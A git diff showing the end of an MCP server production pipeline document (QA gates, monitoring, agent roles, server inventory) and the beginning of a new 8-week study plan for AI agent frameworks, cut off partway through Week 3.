MCP QA Test Runner +SERVICE="$1" +RESULTS="/tmp/mcp-qa-${SERVICE}.md" + +echo "# QA Report: ${SERVICE}" > "$RESULTS" +echo "Date: $(date)" >> "$RESULTS" + +# Static checks +echo "## Static Analysis" >> "$RESULTS" +cd "${SERVICE}-mcp" +npm run build 2>&1 | tail -5 >> "$RESULTS" + +# App file checks +echo "## App Files" >> "$RESULTS" +for f in app-ui/*.html ui/dist/*.html; do + [ -f "$f" ] && echo "✅ $f ($(wc -c < "$f") bytes)" >> "$RESULTS" +done + +# Route mapping check +echo "## Route Mapping" >> "$RESULTS" +# ... verify APP_NAME_MAP entries exist +``` + +### Quality Gate: +- [ ] All static analysis passes +- [ ] Every app renders visually (verified by screenshot) +- [ ] At least 3 NL messages trigger correct tools +- [ ] Thread create/interact/delete cycle works +- [ ] No console errors in browser dev tools + +### QA → Fix Feedback Loop + +QA findings don't just get logged — they route back to the responsible agent for fixes: + +| Finding Type | Routes To | Fix Cycle | +|-------------|-----------|-----------| +| Tool description misrouting | Agent 1 (Analyst) — update analysis doc, then Agent 2 rebuilds | Re-run QA Layer 3 after fix | +| Server crash / protocol error | Agent 2 (Builder) — fix server code | Re-run QA Layers 0-1 | +| App visual bug / accessibility | Agent 3 (Designer) — fix HTML app | Re-run QA Layers 2-2.5 | +| Integration wiring issue | Agent 4 (Integrator) — fix channel config | Re-run QA Layers 3, 5 | +| APP_DATA shape mismatch | Agent 3 + Agent 4 — align app expectations with system prompt | Re-run QA Layer 3 + 5 | + +**Rule:** No server ships with any P0 QA failures. P1 warnings are documented. The fix cycle repeats until QA passes. + +--- + +## Phase 6: Ship (Documentation & Deployment) + +**Skill:** Part of each phase (not separate) + +### Per-server README must include: +- What the service does +- Setup instructions (env vars, API key acquisition) +- Complete tool list with descriptions +- App gallery (screenshots or descriptions) +- Known limitations + +### Post-Ship: MCP Registry Registration + +Register shipped servers in the [MCP Registry](https://registry.modelcontextprotocol.io) for discoverability: +- Server metadata (name, description, icon, capabilities summary) +- Authentication requirements and setup instructions +- Tool catalog summary (names + descriptions) +- Link to README and setup guide + +The MCP Registry launched preview Sep 2025 and is heading to GA. Registration makes your servers discoverable by any MCP client. + +--- + +## Post-Ship Lifecycle + +Shipping is not the end. APIs change, LLMs update, user patterns evolve. + +### Monitoring (continuous) +- **APP_DATA parse success rate** — target >98%, alert at <95% (see QA Tester Layer 6) +- **Tool correctness sampling** — 5% of interactions weekly, LLM-judged +- **User retry rate** — if >25%, system prompt needs tuning +- **Thread completion rate** — >80% target + +### API Change Detection (monthly) +- Check API changelogs for breaking changes, new endpoints, deprecated fields +- Re-run QA Layer 4 (live API testing) quarterly for active servers +- Update MSW mocks when API response shapes change + +### Re-QA Cadence +| Trigger | Scope | Frequency | +|---------|-------|-----------| +| API version bump | Full QA (all layers) | On detection | +| MCP SDK update | Layers 0-1 (protocol + static) | Monthly | +| System prompt change | Layers 3, 5 (functional + integration) | On change | +| App template update | Layers 2-2.5 (visual + accessibility) | On change | +| LLM model upgrade | DeepEval tool routing eval | On model change | +| Routine health check | Layer 4 (live API) + smoke test | Quarterly | + +--- + +## MCP Apps Protocol (Adopt Now) + +> The MCP Apps extension is **live** as of January 26, 2026. Supported by Claude, ChatGPT, VS Code, and Goose. + +Key features: +- **`_meta.ui.resourceUri`** on tools — tools declare which UI to render +- **`ui://` resource URIs** — server-side HTML/JS served as MCP resources +- **JSON-RPC over postMessage** — standardized bidirectional app↔host communication +- **`@modelcontextprotocol/ext-apps`** SDK — App class with `ontoolresult`, `callServerTool` + +**Implication for LocalBosses:** The custom `` pattern works but is LocalBosses-specific. MCP Apps is the official standard for delivering UI from tools. **New servers should adopt MCP Apps. Existing servers should add MCP Apps support alongside the current pattern for backward compatibility.** + +Migration path: +1. Add `_meta.ui.resourceUri` to tool definitions in the server builder +2. Register app HTML files as `ui://` resources in each server +3. Update app template to use `@modelcontextprotocol/ext-apps` App class +4. Maintain backward compat with postMessage/polling for LocalBosses during transition + +--- + +## Operational Notes + +### Version Control Strategy + +All pipeline artifacts should be tracked: + +``` +{service}-mcp/ +├── .git/ # Each server is its own repo (or monorepo) +├── src/ # Server source +├── app-ui/ # App HTML files +├── test-fixtures/ # Test data (committed) +├── test-baselines/ # Visual regression baselines (committed via LFS for images) +├── test-results/ # Test outputs (gitignored) +└── mcp-factory-reviews/ # QA reports (committed for trending) +``` + +- **Branching:** `main` is production. `dev` for active work. Feature branches for new tool groups. +- **Tagging:** Tag each shipped version: `v1.0.0-{service}`. Tag corresponds to the analysis doc version + build. +- **Monorepo option:** For 30+ servers, consider a Turborepo workspace with shared packages (logger, client base class, types). + +### Capacity Planning (Mac Mini) + +Running 30+ MCP servers as stdio processes on a Mac Mini: + +| Config | Capacity | Notes | +|--------|----------|-------| +| Mac Mini M2 (8GB) | ~15 servers | Each Node.js process uses 50-80MB RSS at rest | +| Mac Mini M2 (16GB) | ~25 servers | Leave 4GB for OS + LocalBosses app | +| Mac Mini M2 Pro (32GB) | ~40 servers | Comfortable headroom | + +**Mitigations for constrained memory:** +- Lazy loading (already implemented) — tools only load when called +- On-demand startup — only start servers that have active channels +- HTTP transport with shared process — multiple "servers" behind one Node process +- Containerized with memory limits — `docker run --memory=100m` per server +- PM2 with max memory restart — `pm2 start index.js --max-memory-restart 150M` + +### Server Prioritization (30 Untested Servers) + +For the 30 built-but-untested servers, prioritize by: + +| Criteria | Weight | How to Assess | +|----------|--------|---------------| +| **Business value** | 40% | Which services do users ask about most? Check channel requests. | +| **Credential availability** | 30% | Can we get API keys/sandbox access today? No creds = can't do Layer 4. | +| **API stability** | 20% | Is the API mature (v2+) or beta? Stable APIs = fewer re-QA cycles. | +| **App complexity** | 10% | Simple CRUD (fast) vs complex workflows (slow). Start with simple. | + +**Recommended first batch (highest priority):** +Servers with sandbox APIs + high business value + simple CRUD patterns. Run them through the full pipeline first to validate the process, then tackle complex ones. + +--- + +## Agent Roles + +For mass production, these phases map to specialized agents: + +### Agent 1: API Analyst (`mcp-analyst`) +- **Input:** "Here's the API docs for ServiceX" +- **Does:** Reads all docs, produces `{service}-api-analysis.md` +- **Model:** Opus (needs deep reading comprehension) +- **Skills:** `mcp-api-analyzer` + +### Agent 2: Server Builder (`mcp-builder`) +- **Input:** `{service}-api-analysis.md` +- **Does:** Generates full MCP server with all tools +- **Model:** Sonnet (code generation, well-defined patterns) +- **Skills:** `mcp-server-builder`, `mcp-server-development` + +### Agent 3: App Designer (`mcp-designer`) +- **Input:** `{service}-api-analysis.md` + built server +- **Does:** Creates all HTML apps +- **Model:** Sonnet (HTML/CSS generation) +- **Skills:** `mcp-app-designer`, `frontend-design` + +### Agent 4: Integrator (`mcp-integrator`) +- **Input:** Built server + apps +- **Does:** Wires into LocalBosses (channels, routing, intakes, system prompts) +- **Model:** Sonnet +- **Skills:** `mcp-localbosses-integrator` + +### Agent 5: QA Tester (`mcp-qa`) +- **Input:** Integrated LocalBosses channel +- **Does:** Visual + functional testing, produces test report +- **Model:** Opus (multimodal analysis, judgment calls) +- **Skills:** `mcp-qa-tester` +- **Tools:** Peekaboo, Gemini, browser screenshots + +### Orchestration (6 phases with feedback loop): +``` +[You provide API docs] + │ + ▼ + P1: Agent 1 — Analyst ──→ analysis.md + │ + ├──→ P2: Agent 2 — Builder ──→ MCP server ──┐ + │ │ (parallel) + └──→ P3: Agent 3 — Designer ──→ HTML apps ──┘ + │ + ▼ + P4: Agent 4 — Integrator ──→ LocalBosses wired up + │ + ▼ + P5: Agent 5 — QA Tester ──→ Test report + │ + ┌────────┴────────┐ + │ Findings? │ + │ P0 failures ──→ Route back to + │ Agent 2/3/4 for fix + │ All clear ──→ │ + └────────┬────────┘ + ▼ + P6: Ship + Registry Registration + Monitoring +``` + +Agents 2 and 3 run in parallel since apps only need the analysis doc + tool definitions. QA failures loop back to the responsible agent — no server ships with P0 issues. + +--- + +## Current Inventory (Feb 3, 2026) + +### Completed (in LocalBosses): +- n8n (automations channel) — 8 apps +- GHL CRM (crm channel) — 65 apps +- Reonomy (reonomy channel) — 3 apps +- CloseBot (closebot channel) — 6 apps +- Meta Ads (meta-ads channel) — 11 apps +- Google Console (google-console channel) — 5 apps +- Twilio (twilio channel) — 19 apps + +### Built but untested (30 servers): +Acuity Scheduling, BambooHR, Basecamp, BigCommerce, Brevo, Calendly, ClickUp, Close, Clover, Constant Contact, FieldEdge, FreshBooks, Freshdesk, Gusto, Help Scout, Housecall Pro, Jobber, Keap, Lightspeed, Mailchimp, Pipedrive, Rippling, ServiceTitan, Squarespace, Toast, TouchBistro, Trello, Wave, Wrike, Zendesk + +### Priority: Test the 30 built servers against live APIs and bring the best ones into LocalBosses. + +--- + +## File Locations + +| What | Where | +|------|-------| +| This document | `MCP-FACTORY.md` | +| Skills | `~/.clawdbot/workspace/skills/mcp-*/` | +| Built servers | `mcp-diagrams/mcp-servers/{service}/` or `{service}-mcp/` | +| LocalBosses app | `localbosses-app/` | +| GHL apps (65) | `mcp-diagrams/GoHighLevel-MCP/src/ui/react-app/src/apps/` | +| App routing | `localbosses-app/src/app/api/mcp-apps/route.ts` | +| Channel config | `localbosses-app/src/lib/channels.ts` | diff --git a/agent-repos-study-plan.md b/agent-repos-study-plan.md new file mode 100644 index 0000000..b1475c7 --- /dev/null +++ b/agent-repos-study-plan.md @@ -0,0 +1,1497 @@ +# 🧠 AI Agent Frameworks — 8-Week Deep Study Plan + +> **Goal:** Go from "I've heard of these" to "I could build & deploy production systems with these" in 8 weeks. +> **Time commitment:** ~1-2 hours/day, Mon-Fri +> **Based on:** [Trending Repos Deep Dive Analysis](./trending-repos-deep-dive.md) (Feb 2026) +> **Last updated:** February 4, 2026 + +--- + +## 📋 Table of Contents + +- [Week 0: Prep & Prerequisites](#week-0-prep--prerequisites) +- [Week 1: Pydantic-AI](#week-1-pydantic-ai) — The Production SDK ⭐⭐ +- [Week 2: Microsoft Agent Framework](#week-2-microsoft-agent-framework) — Enterprise Orchestration ⭐⭐⭐ +- [Week 3: Agent-S](#week-3-agent-s) — Computer Use Pioneer ⭐⭐⭐⭐ +- [Week 4: GPT Researcher](#week-4-gpt-researcher) — Deep Research Agent ⭐⭐ +- [Week 5: Yao](#week-5-yao) — Event-Driven Agents in Go ⭐⭐⭐⭐ +- [Week 6: MetaGPT](#week-6-metagpt) — Multi-Agent SOP Framework ⭐⭐⭐ +- [Week 7: ElizaOS](#week-7-elizaos) — Deployment & Multi-Platform Distribution ⭐⭐ +- [Week 8: Capstone Project](#week-8-capstone-project) +- [Appendix: Comparison Matrix Template](#appendix-comparison-matrix-template) + +> ⭐ = Difficulty Rating (1-5). More stars = harder week. + +--- + +## Week 0: Prep & Prerequisites + +> **Timeline:** The weekend before you start. ~3-4 hours total. + +### Environment Setup + +- [ ] **Python 3.11+** installed (`python --version`) +- [ ] **Go 1.21+** installed for Week 5 (`go version`) +- [ ] **Node.js 18+** and `pnpm` installed (needed for MetaGPT and Yao) +- [ ] **Docker Desktop** installed and running +- [ ] **Git** configured with SSH keys for cloning repos +- [ ] **VS Code** (or your editor) with Python + Go extensions +- [ ] **A GPU or cloud GPU access** (optional, helps for Agent-S grounding model) + +### API Keys & Accounts + +- [ ] **OpenAI API key** — used by almost every framework +- [ ] **Anthropic API key** — primary for Pydantic-AI examples +- [ ] **Tavily API key** — required for GPT Researcher (free tier works: [app.tavily.com](https://app.tavily.com)) +- [ ] **Azure OpenAI access** — needed for Microsoft Agent Framework (free trial available) +- [ ] **Hugging Face account + token** — needed for Agent-S grounding model +- [ ] **Google API key** — optional, for Gemini-based features in GPT Researcher + +### Workspace Setup + +```bash +# Create a clean workspace for all 6 weeks +mkdir -p ~/agent-study/{week1-pydantic-ai,week2-ms-agent,week3-agent-s,week4-gpt-researcher,week5-yao,week6-metagpt,capstone} +mkdir -p ~/agent-study/notes +mkdir -p ~/agent-study/comparison-matrix + +# Initialize a git repo for your study notes +cd ~/agent-study +git init +echo "# AI Agent Frameworks Study" > README.md +git add . && git commit -m "init study workspace" +``` + +### Background Reading (1-2 hours) + +Read these before Week 1. They're the conceptual foundation: + +- [ ] **[Plan-and-Solve Prompting](https://arxiv.org/abs/2305.04091)** — The paper behind GPT Researcher's architecture. Skim the abstract + Section 3. +- [ ] **[RAG paper](https://arxiv.org/abs/2005.11401)** — Core concept used by multiple frameworks. Read abstract + intro. +- [ ] **[Model Context Protocol (MCP) spec](https://modelcontextprotocol.io/)** — Anthropic's protocol for tool integration. Read the overview page. +- [ ] **[Agent2Agent (A2A) protocol](https://google.github.io/A2A/)** — Google's agent interop standard. Skim the spec overview. +- [ ] **[Pydantic docs (crash course)](https://docs.pydantic.dev/latest/concepts/models/)** — If you're rusty on Pydantic, spend 30 min here. It's the foundation of Week 1. + +### Mental Model to Build + +Every agent framework answers the same 5 questions differently: + +1. **How do you define an agent?** (class, function, config, DSL) +2. **How do agents use tools?** (function calling, MCP, code execution) +3. **How do multiple agents coordinate?** (graph, SOP, message passing, events) +4. **How do you handle errors & retries?** (automatic, manual, durable execution) +5. **How do you observe what happened?** (logging, tracing, replay) + +Keep these questions in mind every week. By Week 6, you'll have 6 different answers for each. + +--- + +## Week 1: Pydantic-AI + +> **Difficulty:** ⭐⭐ (Approachable — excellent docs, familiar Python patterns) +> **Repo:** [github.com/pydantic/pydantic-ai](https://github.com/pydantic/pydantic-ai) +> **Stars:** 14.6k | **Language:** Python | **Version:** v1.52.0+ + +### Why This Is Week 1 + +Pydantic-AI is the most ergonomic agent framework and has the best docs. Starting here builds your mental model for how agent SDKs *should* feel. Everything after this week will be compared to Pydantic-AI's developer experience. It's the FastAPI of agents — you'll understand why once you use it. + +### Resources + +| Resource | Link | +|----------|------| +| 📖 Documentation | [ai.pydantic.dev](https://ai.pydantic.dev/) | +| 💬 Community (Slack) | [Pydantic Slack](https://logfire.pydantic.dev/docs/join-slack/) | +| 📦 PyPI | [pydantic-ai](https://pypi.org/project/pydantic-ai/) | +| 🔭 Observability | [Pydantic Logfire](https://pydantic.dev/logfire) | +| 📝 Blog: How it was built | [Pydantic blog](https://pydantic.dev/articles) | +| 🎥 Intro video | Search "Pydantic AI tutorial 2025" on YouTube | + +### 🗂 Source Code Guide — "Read THESE Files" + +``` +pydantic_ai_slim/pydantic_ai/ +├── agent/ +│ └── __init__.py # ⭐ THE file. Agent class definition, run(), run_sync(), run_stream() +├── _agent_graph.py # ⭐ Internal agent execution graph — how runs actually execute +├── tools.py # ⭐ Tool decorator, RunContext, tool schema generation +├── result.py # ⭐ RunResult, StreamedRunResult — output handling +├── models/ +│ ├── __init__.py # Model ABC — how all model providers implement the same interface +│ ├── openai.py # OpenAI provider implementation +│ └── anthropic.py # Anthropic provider implementation +├── _a2a.py # Agent2Agent protocol integration +├── mcp.py # MCP client/server integration +└── _output.py # Output type handling, Pydantic validation on LLM outputs +``` + +> **💡 Tip:** Start with `agent/__init__.py`. It's beautifully documented with docstrings. Then read `tools.py` to understand how the `@agent.tool` decorator works. Finally, read `_agent_graph.py` to see how the runtime orchestrates tool calls. + +--- + +### Day 1 (Monday): Architecture Deep Dive + +**Read:** +- [ ] The full [README](https://github.com/pydantic/pydantic-ai) +- [ ] Docs: [Introduction](https://ai.pydantic.dev/) +- [ ] Docs: [Agents](https://ai.pydantic.dev/agents) +- [ ] Docs: [Models Overview](https://ai.pydantic.dev/models/overview) +- [ ] Docs: [Tools](https://ai.pydantic.dev/tools) +- [ ] Docs: [Output / Structured Results](https://ai.pydantic.dev/output) +- [ ] Docs: [Dependency Injection](https://ai.pydantic.dev/dependencies) (if exists) or see DI pattern in the bank support example + +**Identify core abstractions:** +- `Agent` — the central class (generic over deps + output type) +- `RunContext` — carries dependencies into tool functions +- `Tool` — decorated functions the LLM can call +- `ModelSettings` — per-request model configuration +- `RunResult` / `StreamedRunResult` — typed output containers + +**Understand the execution flow:** +``` +User prompt → Agent.run() → Model call → [Tool call → Tool execution → Model call]* → Validated output +``` + +- [ ] **📝 Homework:** Write a 1-page architecture summary at `~/agent-study/notes/week1-architecture.md` + - Cover: Agent lifecycle, dependency injection pattern, how tools are registered and called, how output validation works + - Draw a simple diagram (ASCII or hand-drawn photo is fine) + +--- + +### Day 2 (Tuesday): Hello World + Core Concepts + +**Setup:** +```bash +cd ~/agent-study/week1-pydantic-ai +python -m venv .venv && source .venv/bin/activate +pip install pydantic-ai +``` + +**Run the quickstart:** +```python +from pydantic_ai import Agent + +agent = Agent( + 'anthropic:claude-sonnet-4-0', + instructions='Be concise, reply with one sentence.', +) + +result = agent.run_sync('Where does "hello world" come from?') +print(result.output) +``` + +**Understand the core API surface:** +- [ ] `agent.run()` vs `agent.run_sync()` vs `agent.run_stream()` +- [ ] How `instructions` work (static string vs dynamic function) +- [ ] How model selection works (string shorthand vs model objects) +- [ ] How `result.output` is typed + +- [ ] **📝 Homework:** Build the simplest agent from scratch — NO copy-paste + - Requirements: takes a topic, returns a structured output (use a Pydantic model as the output type) + - Must use at least one custom instruction + - Save at `~/agent-study/week1-pydantic-ai/hello_agent.py` + +--- + +### Day 3 (Wednesday): Intermediate Build — Structured Output + DI + +**Focus: Pydantic-AI's killer features — type-safe structured output and dependency injection** + +**Work through:** +- [ ] The [bank support agent example](https://ai.pydantic.dev/#tools-dependency-injection-example) from the docs +- [ ] Docs: [Structured Output / Streamed Results](https://ai.pydantic.dev/output#streamed-results) +- [ ] Docs: [Graph Support](https://ai.pydantic.dev/graph) + +**Key concepts to grok:** +- How `RunContext[DepsType]` carries typed dependencies +- How Pydantic models as output types create validated, structured responses +- How tool docstrings become the tool description sent to the LLM +- How streaming works with structured output (partial validation!) + +- [ ] **📝 Homework:** Build an agent that uses the framework's unique capabilities: + - **Must include:** Dependency injection with a real dependency (database mock, API client, etc.) + - **Must include:** Structured output via a Pydantic model (not just string output) + - **Must include:** At least 2 tools + - Example idea: A "recipe finder" agent with deps for a recipe database, tools for searching and filtering, output as a structured `Recipe` model + - Save at `~/agent-study/week1-pydantic-ai/structured_agent.py` + +--- + +### Day 4 (Thursday): Advanced Patterns + Source Code Reading + +**Read these source files (in order):** +1. `pydantic_ai_slim/pydantic_ai/agent/__init__.py` — How `Agent` class is defined, the generic type parameters +2. `pydantic_ai_slim/pydantic_ai/tools.py` — How `@tool` works, schema generation, `RunContext` +3. `pydantic_ai_slim/pydantic_ai/_agent_graph.py` — The internal execution engine +4. `pydantic_ai_slim/pydantic_ai/result.py` — How results are wrapped, streamed, validated +5. `pydantic_ai_slim/pydantic_ai/models/__init__.py` — The model provider ABC + +**Understand:** +- [ ] How errors from tool execution are passed back to the LLM for retry +- [ ] How streaming works internally (incremental Pydantic validation) +- [ ] How the `_agent_graph.py` orchestrates the conversation loop +- [ ] How durable execution checkpoints work + +**Explore advanced features:** +- [ ] Docs: [Durable Execution](https://ai.pydantic.dev/durable_execution/overview/) +- [ ] Docs: [MCP Integration](https://ai.pydantic.dev/mcp/overview) +- [ ] Docs: [Human-in-the-Loop](https://ai.pydantic.dev/deferred-tools) +- [ ] Docs: [Evals](https://ai.pydantic.dev/evals) + +- [ ] **📝 Homework:** Write "What I'd Steal from Pydantic-AI" at `~/agent-study/notes/week1-steal.md` + - Focus on: DI pattern, type-safe generics, streaming validation, tool retry pattern + - What design decisions are genius? What would you do differently? + +--- + +### Day 5 (Friday): Integration Project + Reflection + +- [ ] **Build a mini-project** that integrates with something real: + - **Suggested:** An agent that queries a real API (weather, GitHub, Hacker News), processes the data through tools, and returns a structured report as a Pydantic model + - **Bonus:** Add Logfire observability (it's free tier) and see the traces + - **Bonus:** Expose it as an MCP server + - Save at `~/agent-study/week1-pydantic-ai/integration_project/` + +- [ ] **Write retrospective** at `~/agent-study/notes/week1-retro.md`: + - Strengths of Pydantic-AI + - Weaknesses / gaps you noticed + - When would you reach for this vs building from scratch? + - What surprised you? + +- [ ] **Start comparison matrix** at `~/agent-study/comparison-matrix/matrix.md` (see [template](#appendix-comparison-matrix-template)) + +### 🎯 Key Questions — You Should Be Able to Answer: + +1. What does the `Agent` class generic signature `Agent[DepsType, OutputType]` buy you? +2. How does dependency injection work in Pydantic-AI and why is it better than global state? +3. How does Pydantic-AI validate structured output from an LLM that returns free-form text? +4. What happens when a tool call fails? How does the retry loop work? +5. What's the difference between `run()`, `run_sync()`, and `run_stream()`? +6. How would you add a new model provider to Pydantic-AI? +7. What is durable execution and when would you use it? + +--- + +## Week 2: Microsoft Agent Framework + +> **Difficulty:** ⭐⭐⭐ (Larger surface area, graph concepts, mono-repo navigation) +> **Repo:** [github.com/microsoft/agent-framework](https://github.com/microsoft/agent-framework) +> **Stars:** 7k | **Languages:** Python + .NET | **Born from:** Semantic Kernel + AutoGen + +### Why This Is Week 2 + +If Pydantic-AI is the developer's choice, Microsoft Agent Framework is the enterprise's choice. It introduces graph-based workflows — a fundamentally different orchestration model from the simple agent loop you learned in Week 1. Understanding this framework means understanding where corporate AI agent development is heading. + +### Resources + +| Resource | Link | +|----------|------| +| 📖 Documentation | [learn.microsoft.com/agent-framework](https://learn.microsoft.com/en-us/agent-framework/) | +| 🚀 Quick Start | [Quick Start Tutorial](https://learn.microsoft.com/agent-framework/tutorials/quick-start) | +| 💬 Discord | [Discord](https://discord.gg/b5zjErwbQM) | +| 🎥 Intro Video (30 min) | [YouTube](https://www.youtube.com/watch?v=AAgdMhftj8w) | +| 🎥 DevUI Demo (1 min) | [YouTube](https://www.youtube.com/watch?v=mOAaGY4WPvc) | +| 📦 PyPI | [agent-framework](https://pypi.org/project/agent-framework/) | +| 📝 Migration from SK | [Semantic Kernel Migration](https://learn.microsoft.com/en-us/agent-framework/migration-guide/from-semantic-kernel) | +| 📝 Migration from AutoGen | [AutoGen Migration](https://learn.microsoft.com/en-us/agent-framework/migration-guide/from-autogen) | + +### 🗂 Source Code Guide + +``` +python/packages/ +├── agent-framework/ # ⭐ Core package — agents, middleware, workflows +│ └── src/agent_framework/ +│ ├── agents/ # Agent base classes and implementations +│ ├── workflows/ # ⭐ Graph-based workflow engine +│ └── middleware/ # ⭐ Request/response middleware pipeline +├── azure-ai/ # Azure AI provider (Responses API) +├── openai/ # OpenAI provider +├── anthropic/ # Anthropic provider +├── devui/ # ⭐ Developer UI for debugging workflows +├── mcp/ # MCP integration +├── a2a/ # Agent2Agent protocol +└── lab/ # Experimental features (benchmarking, RL) + +python/samples/getting_started/ +├── agents/ # ⭐ Start here — basic agent examples +├── workflows/ # ⭐ Graph workflow examples (critical!) +├── middleware/ # Middleware examples +└── observability/ # OpenTelemetry integration +``` + +> **💡 Tip:** This is a mono-repo. Don't try to read everything. Focus on `python/packages/agent-framework/` for the core, and `python/samples/getting_started/workflows/` for the graph workflow examples. + +--- + +### Day 1 (Monday): Architecture Deep Dive + +**Read:** +- [ ] [Overview](https://learn.microsoft.com/agent-framework/overview/agent-framework-overview) +- [ ] The full [README](https://github.com/microsoft/agent-framework) +- [ ] [User Guide Overview](https://learn.microsoft.com/en-us/agent-framework/user-guide/overview) +- [ ] Watch the [30-min intro video](https://www.youtube.com/watch?v=AAgdMhftj8w) (at 1.5x speed) +- [ ] Skim the [SK migration guide](https://learn.microsoft.com/en-us/agent-framework/migration-guide/from-semantic-kernel) to understand lineage + +**Identify core abstractions:** +- `Agent` — base agent interface +- `Workflow` / `Graph` — the graph-based orchestration system +- `Middleware` — request/response processing pipeline +- `AgentProvider` — LLM provider abstraction +- `DevUI` — visual debugging tool + +**Key architectural insight:** This framework uses a **data-flow graph** model where nodes are agents or functions, and edges carry data between them. This is fundamentally different from Pydantic-AI's linear agent loop. + +- [ ] **📝 Homework:** Write a 1-page architecture summary at `~/agent-study/notes/week2-architecture.md` + - Compare the graph workflow model to Pydantic-AI's linear model + - Draw the graph workflow concept (nodes = agents/functions, edges = data flow) + +--- + +### Day 2 (Tuesday): Hello World + Core Concepts + +**Setup:** +```bash +cd ~/agent-study/week2-ms-agent +python -m venv .venv && source .venv/bin/activate +pip install agent-framework --pre +# You'll need Azure credentials or an OpenAI key +``` + +**Run the quickstart:** +```python +import asyncio +from agent_framework.openai import OpenAIChatClient + +async def main(): + agent = OpenAIChatClient( + api_key="your-key" + ).as_agent( + name="HaikuBot", + instructions="You are an upbeat assistant that writes beautifully.", + ) + print(await agent.run("Write a haiku about AI agents.")) + +asyncio.run(main()) +``` + +**Understand:** +- [ ] `as_agent()` pattern — how providers become agents +- [ ] The difference between Chat agents and Responses agents +- [ ] How the Python API differs from the .NET API (skim a .NET example) + +- [ ] **📝 Homework:** Build the simplest agent from scratch — NO copy-paste + - Save at `~/agent-study/week2-ms-agent/hello_agent.py` + +--- + +### Day 3 (Wednesday): Intermediate Build — Graph Workflows + +**This is the key differentiator. This is the day that matters.** + +**Work through:** +- [ ] `python/samples/getting_started/workflows/` — all examples +- [ ] Docs: Workflow/Graph tutorials on learn.microsoft.com +- [ ] Understand streaming, checkpointing, and time-travel in graphs + +**Key concepts:** +- How nodes in a graph can be agents OR deterministic functions +- How data flows between nodes via typed edges +- How checkpointing enables pause/resume of long-running workflows +- How human-in-the-loop fits into the graph model +- How time-travel lets you replay/debug workflows + +- [ ] **📝 Homework:** Build a graph workflow: + - **Must include:** At least 3 nodes (mix of agent nodes and function nodes) + - **Must include:** Branching logic (conditional edges) + - Example idea: A "content pipeline" — Node 1 (agent: research a topic) → Node 2 (function: format research) → Node 3 (agent: write blog post) with a branch for "needs more research" + - Save at `~/agent-study/week2-ms-agent/graph_workflow.py` + +--- + +### Day 4 (Thursday): Advanced Patterns + Source Code Reading + +**Read these source files:** +1. Core agent base classes in `python/packages/agent-framework/` +2. Workflow/graph engine implementation +3. Middleware pipeline implementation +4. DevUI package structure +5. At least one provider implementation (OpenAI or Azure) + +**Explore:** +- [ ] Set up and run the **DevUI** — visualize your graph workflow from Day 3 +- [ ] Look at the **OpenTelemetry integration** — `python/samples/getting_started/observability/` +- [ ] Read the **middleware examples** — understand the request/response pipeline +- [ ] Check out the **lab package** — what's experimental? + +- [ ] **📝 Homework:** Write "What I'd Steal from MS Agent Framework" at `~/agent-study/notes/week2-steal.md` + - Focus on: Graph workflow model, DevUI concept, middleware pipeline, multi-language support + - Compare to Pydantic-AI: when would you choose one over the other? + +--- + +### Day 5 (Friday): Integration Project + Reflection + +- [ ] **Build a mini-project:** + - **Suggested:** A multi-step data processing pipeline using graph workflows + - Must have: at least one agent node calling an LLM, at least one pure function node, checkpointing enabled + - **Bonus:** Get the DevUI running and screenshot your workflow visualization + - Save at `~/agent-study/week2-ms-agent/integration_project/` + +- [ ] **Write retrospective** at `~/agent-study/notes/week2-retro.md` +- [ ] **Update comparison matrix** — add MS Agent Framework entry + +### 🎯 Key Questions: + +1. What's the difference between a linear agent loop and a graph-based workflow? +2. How does checkpointing work in MS Agent Framework workflows? +3. What does "time-travel" mean in the context of agent debugging? +4. How does the middleware pipeline work and when would you use it? +5. What's the DevUI and what can you debug with it that you can't with logs alone? +6. How does this framework's agent abstraction compare to Pydantic-AI's `Agent` class? +7. When would you choose MS Agent Framework over Pydantic-AI? (Think: team size, workflow complexity, language requirements) + +--- + +## Week 3: Agent-S + +> **Difficulty:** ⭐⭐⭐⭐ (Requires GPU for grounding model, novel paradigm, research-grade code) +> **Repo:** [github.com/simular-ai/Agent-S](https://github.com/simular-ai/Agent-S) +> **Stars:** 9.6k | **Language:** Python | **Papers:** ICLR 2025, COLM 2025 + +### Why This Is Week 3 + +This is a completely different paradigm. Weeks 1-2 were about agents that work with APIs and text. Agent-S works with **pixels and clicks** — it uses your computer like a human does. This is the frontier of agent development. Understanding Agent-S means understanding where computer-use agents are heading. + +### Resources + +| Resource | Link | +|----------|------| +| 📖 Repo | [github.com/simular-ai/Agent-S](https://github.com/simular-ai/Agent-S) | +| 💬 Discord | [Discord](https://discord.gg/E2XfsK9fPV) | +| 📄 S1 Paper (ICLR 2025) | [arxiv.org/abs/2410.08164](https://arxiv.org/abs/2410.08164) | +| 📄 S2 Paper (COLM 2025) | [arxiv.org/abs/2504.00906](https://arxiv.org/abs/2504.00906) | +| 📄 S3 Paper | [arxiv.org/abs/2510.02250](https://arxiv.org/abs/2510.02250) | +| 🌐 S3 Blog | [simular.ai/articles/agent-s3](https://www.simular.ai/articles/agent-s3) | +| 🎥 S3 Video | [YouTube](https://www.youtube.com/watch?v=VHr0a3UBsh4) | +| 📦 PyPI | [gui-agents](https://pypi.org/project/gui-agents/) | +| 🤗 Grounding Model | [UI-TARS-1.5-7B](https://huggingface.co/ByteDance-Seed/UI-TARS-1.5-7B) | + +### 🗂 Source Code Guide + +``` +gui_agents/ +├── s3/ # ⭐ Latest version — start here +│ ├── cli_app.py # ⭐ Entry point — CLI application, main loop +│ ├── agents/ # ⭐ Agent implementations (planning, grounding, execution) +│ ├── core/ # ⭐ Core abstractions (screenshot, actions, state) +│ ├── bbon/ # Behavior Best-of-N — sampling strategy for better performance +│ └── prompts/ # System prompts for each agent role +├── s2/ # Previous version +├── s2_5/ # Intermediate version +├── s1/ # Original version (ICLR 2025) +└── utils.py # Shared utilities +``` + +> **💡 Tip:** Focus entirely on `gui_agents/s3/`. Read the papers' system diagrams first, THEN the code. The code makes 10x more sense with the paper's architecture diagram in front of you. + +> **⚠️ Setup Note:** Agent-S requires a grounding model (UI-TARS-1.5-7B). You can host it on Hugging Face Inference Endpoints (~$1-2/hr for A10G), use a free tier if available, or run it locally if you have a capable GPU (16GB+ VRAM). Alternatively, study the code architecture without running the full system. + +--- + +### Day 1 (Monday): Architecture Deep Dive + +**Read:** +- [ ] The full [README](https://github.com/simular-ai/Agent-S) +- [ ] [S3 blog post](https://www.simular.ai/articles/agent-s3) — accessible overview +- [ ] **S1 Paper** (at least abstract + Sections 1-3) — core architecture concepts +- [ ] **S3 Paper** (abstract + architecture section) — latest improvements +- 